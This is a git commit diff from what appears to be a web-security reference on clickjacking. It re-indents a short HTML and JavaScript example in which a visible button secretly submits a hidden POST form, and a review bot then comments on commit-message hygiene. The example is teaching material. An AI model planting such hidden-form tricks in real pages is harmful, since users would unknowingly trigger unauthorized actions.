References updated for CORS CRLF CSV

Swissky
2024-11-04 18:00:07 +01:00
parent 4dc409d31e
commit e138308d3d
7 changed files with 125 additions and 124 deletions


@@ -83,17 +83,18 @@ Button/Form Hijacking is a Clickjacking technique where attackers trick users in
</form>
```
* Deceptive Interaction: When the user clicks the visible button, they are unknowingly interacting with the hidden form due to the invisible overlay. The form is submitted, potentially causing unauthorized actions or data leakage.
```html
<button onclick="submitForm()">Click me</button>
<form action="legitimate-site" method="POST" id="hidden-form">
<!-- Hidden form fields -->
</form>
<script>
function submitForm() {
document.getElementById('hidden-form').submit();
}
</script>
```
```html
<button onclick="submitForm()">Click me</button>
<form action="legitimate-site" method="POST" id="hidden-form">
<!-- Hidden form fields -->
</form>
<script>
function submitForm() {
document.getElementById('hidden-form').submit();
}
</script>
```
### Execution Methods
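Review bot: The removed and re-added `html` fence under the "Deceptive Interaction" bullet reads identically line for line here, so this hunk looks like a whitespace or indentation change only, while the commit message mentions only reference updates for CORS, CRLF and CSV. Either note the Clickjacking formatting change in the commit message or split it into its own commit, so the history for this file stays searchable. The hunk header also goes from 17 to 18 lines, so one line is net added; please confirm it is an intended blank line and not a stray one inside the fence. While touching this example, consider a short comment saying that `action="legitimate-site"` is a placeholder for the framed target, since the snippet itself does not show the invisible overlay the bullet describes.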